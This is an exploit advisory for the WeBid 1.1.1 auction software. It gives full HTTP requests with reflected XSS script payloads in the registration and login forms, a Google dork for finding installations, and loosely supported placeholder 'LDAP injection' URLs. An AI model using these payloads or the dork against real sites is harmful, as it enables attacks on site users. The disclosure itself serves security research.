##################################################################################################
#
#Exploit Title : WeBid Version 1.1.1 multiple vulnerability 
#Author        : Govind Singh aka NullPort
#Vendor        : http://www.webidsupport.com/
#Download Link : http://sourceforge.net/projects/simpleauction/files/simpleauction/WeBid%20v1.1.1/WeBid-1.1.1.zip/download
#Google Dork   : "Powered by WeBid" 
#Date          : 11/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to       : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to      : All IHT Members 
#           
###################################################################################################

1. Reflected Cross-Site Scripting :
2. LDAP Injection

1. http://localhost/WeBid/register.php

Reflected Cross-Site Scripting in the parameters are :
 "TPL_name=" 
 "TPL_nick=" 
 "TPL_email" 
 "TPL_year" 
 "TPL_address" 
 "TPL_city" 
 "TPL_prov" 
 "TPL_zip" 
 "TPL_phone" 
 "TPL_pp_email" 
 "TPL_authnet_id" 
 "TPL_authnet_pass" 
 "TPL_wordpay_id" 
 "TPL_toocheckout_id" 
 "TPL_moneybookers_email"
 
PoC :
we can run our xss script with all these different parameters 

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/web-id/register.php
Cookie=WEBID_ONLINE=57e5a8970c4a9df8850c130e44e49160; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=417
POSTDATA=csrftoken=&TPL_name="><script>alert('Hacked By Govind Singh aka NullPort');</script>&TPL_nick=&TPL_password=&TPL_repeat_password=&TPL_email=&TPL_day=&TPL_month=00&TPL_year=&TPL_address=&TPL_city=&TPL_prov=&TPL_country=United+Kingdom&TPL_zip=&TPL_phone=&TPL_timezone=0&TPL_nletter=1&TPL_pp_email=&TPL_authnet_id=&TPL_authnet_pass=&TPL_worldpay_id=&TPL_toocheckout_id=&TPL_moneybookers_email=&captcha_code=&action=first
----------------------------------------------------------------------------------------------------------------
2. http://localhost/WeBid/user_login.php

Reflected Cross-Site Scripting in the parameter is :
 "username" 

Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/web-id/user_login.php
Cookie=WEBID_ONLINE=e54c2acd05a02315f39ddb4d3a112c1e; PHPSESSID=2g18aupihsotkmka8778utvk47
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=96
POSTDATA=username="><script>alert('xss PoC By Govind Singh');</script>&password=&input=Login&action=login
==================================================================================================================
2. LDAP Injection 

PoC :
http://localhost/WeBid/loader.php?js=[LDAP]
http://localhost/WeBid/loader.php?js=js/jquery.js;js/jquery.lightbox.js;

PoC
http://localhost/WeBid/viewhelp.php?cat=[LDAP]
Replace cat= as 1,2,3,4 

----------------------------------------------------------------------------------------------------------------------